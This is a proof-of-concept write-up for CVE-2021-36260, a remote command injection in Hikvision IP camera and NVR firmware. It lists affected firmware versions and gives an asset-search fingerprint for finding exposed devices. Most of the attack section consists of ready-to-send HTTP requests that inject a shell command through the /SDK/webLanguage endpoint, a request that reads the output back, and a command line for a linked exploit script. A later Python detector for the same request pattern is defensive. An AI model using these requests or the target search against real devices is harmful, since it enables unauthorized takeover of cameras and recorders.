POC00/海康威视IP摄像机_NVR设备固件远程代码执行漏洞(CVE-2021-36260).md
2025-04-02 22:36:18 +08:00
# Hikvision IP Camera / NVR Firmware Remote Code Execution Vulnerability (CVE-2021-36260)
# 1. Vulnerability Summary
An unauthenticated remote code execution vulnerability, CVE-2021-36260, was found in the firmware of Hikvision IP cameras and NVR devices. The flaw affects IP camera and NVR firmware and stems from insufficient validation of input parameters: an unauthenticated attacker who sends a crafted request containing a malicious command to an affected device can achieve remote command execution.
# 2. Affected Versions
+ Vulnerable network camera firmware.
| **Product type** | **Affected version** |
| :---: | :---: |
| IPC_E0 | IPC_E0_CN_STD_5.4.6_180112 |
| IPC_E1 | Unknown |
| IPC_E2 | IPC_E2_EN_STD_5.5.52_180620 |
| IPC_E4 | Unknown |
| IPC_E6 | IPCK_E6_EN_STD_5.5.100_200226 |
| IPC_E7 | IPCK_E7_EN_STD_5.5.120_200604 |
| IPC_G3 | IPC_G3_EN_STD_5.5.160_210416 |
| IPC_G5 | IPC_G5_EN_STD_5.5.113_210317 |
| IPC_H1 | IPC_H1_EN_STD_5.4.61_181204 |
| IPC_H5 | IPCP_H5_EN_STD_5.5.85_201120 |
| IPC_H8 | Factory installed firmware mid 2021 |
| IPC_R2 | IPC_R2_EN_STD_V5.4.81_180203 |
+ Vulnerable PTZ camera firmware.
| **Product type** | **Affected version** |
| :---: | :---: |
| IPD_E7 | IPDEX_E7_EN_STD_5.6.30_210526 |
| IPD_G3 | IPDES_G3_EN_STD_5.5.42_210106 |
| IPD_H5 | IPD_H5_EN_STD_5.5.41_200911 |
| IPD_H7 | IPD_H7_EN_STD_5.5.40_200721 |
| IPD_H8 | IPD_H8_EN_STD_5.7.1_210619 |
+ Vulnerable legacy firmware.
| **Product type** | **Affected version** |
| :---: | :---: |
| IPC_R7 | 5.4.x |
| IPD_R7 | |
| IPC_G0 | |
| IPC_H3 | |
| IPD_H3 | |
# 3. Asset Mapping
+ Hunter: `header="671-1e0-587ec4a1"`
+ Fingerprint
![1700231990825-56e1158c-4918-4b47-a71e-0af9fcbfc673.png](./img/BRUyZKZO0-k6Y5uv/1700231990825-56e1158c-4918-4b47-a71e-0af9fcbfc673-137663.png)
# 4. Vulnerability Reproduction
1. Execute a command and write its output to a file
```plain
PUT /SDK/webLanguage HTTP/1.1
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: xx.xx.xx.xx
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Language: en-US,en;q=0.9,sv;q=0.8
Content-Length: 79

<?xml version="1.0" encoding="UTF-8"?><language>$(ifconfig>webLib/x)</language>
```
![1700232070419-9804d121-8b87-42e2-bb05-45566b0d57e5.png](./img/BRUyZKZO0-k6Y5uv/1700232070419-9804d121-8b87-42e2-bb05-45566b0d57e5-028165.png)
2. Retrieve the command output
```plain
GET /x HTTP/1.1
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: xx.xx.xx.xx
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Language: en-US,en;q=0.9,sv;q=0.8
```
![1700232088177-c92f2bcb-4980-4685-bbdf-38be1ec84437.png](./img/BRUyZKZO0-k6Y5uv/1700232088177-c92f2bcb-4980-4685-bbdf-38be1ec84437-357466.png)
Exploit script
[HIKVISION_CVE-2021-36260_rce.py](https://www.yuque.com/attachments/yuque/0/2024/py/1622799/1709222237457-6ffbdfa8-06b2-47c4-b0a5-0576e9fd5cda.py)
```plain
python HIKVISION_CVE-2021-36260_rce.py --rhost xx.xx.xx.xx --rport 8098 --cmd "ls -al"
```
![1700232671938-598342d8-9715-45cc-8ecf-477e359015aa.png](./img/BRUyZKZO0-k6Y5uv/1700232671938-598342d8-9715-45cc-8ecf-477e359015aa-640350.png)
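A defender-side check for the request pattern shown above, added here as an example and not part of the original write-up or of the linked script: it parses a raw HTTP request as a proxy, WAF or IDS would see it and flags a PUT to `/SDK/webLanguage` whose `<language>` element carries shell metacharacters. The sample requests are constructed for the example; the host address is a placeholder.

```python
import re

# Request pattern described in the write-up: PUT to /SDK/webLanguage with a
# command substitution inside the <language> element of the XML body.
TARGET_PATH = "/SDK/webLanguage"
LANGUAGE_RE = re.compile(r"<language>(.*?)</language>", re.S | re.I)
# Shell metacharacters that turn a language code into an injected command.
SHELL_META_RE = re.compile(r"\$\(|`|[;|&]")

# Constructed sample requests (mirroring the request shown above).
INJECTION_REQUEST = (
    "PUT /SDK/webLanguage HTTP/1.1\r\n"
    "Host: 192.0.2.10\r\n"
    "Content-Length: 79\r\n\r\n"
    '<?xml version="1.0" encoding="UTF-8"?>'
    "<language>$(ifconfig>webLib/x)</language>"
)
BENIGN_REQUEST = (
    "PUT /SDK/webLanguage HTTP/1.1\r\n"
    "Host: 192.0.2.10\r\n"
    "Content-Length: 61\r\n\r\n"
    '<?xml version="1.0" encoding="UTF-8"?><language>en</language>'
)

def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    request_line, *header_lines = head.split("\n")
    parts = request_line.split()
    method, path = (parts + ["", ""])[:2]
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method.upper(), path, headers, body

def is_cve_2021_36260_attempt(raw: str) -> bool:
    """True when the request matches the unauthenticated injection pattern."""
    method, path, _, body = parse_request(raw)
    if method != "PUT" or path.split("?", 1)[0] != TARGET_PATH:
        return False
    match = LANGUAGE_RE.search(body)
    # A missing <language> element or a plain language code is not an attempt.
    return bool(match and SHELL_META_RE.search(match.group(1)))

def scan_requests(requests):
    """Return the indexes of requests that look like exploitation attempts."""
    return [i for i, raw in enumerate(requests) if is_cve_2021_36260_attempt(raw)]
```

Alerting on the PUT alone would also catch legitimate language changes from the web UI, so the check keys on the metacharacters inside the element rather than on the path.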
> Updated: 2024-02-29 23:57:17
> Source: <https://www.yuque.com/xiaokp7/ocvun2/ph37hx0zftramet9>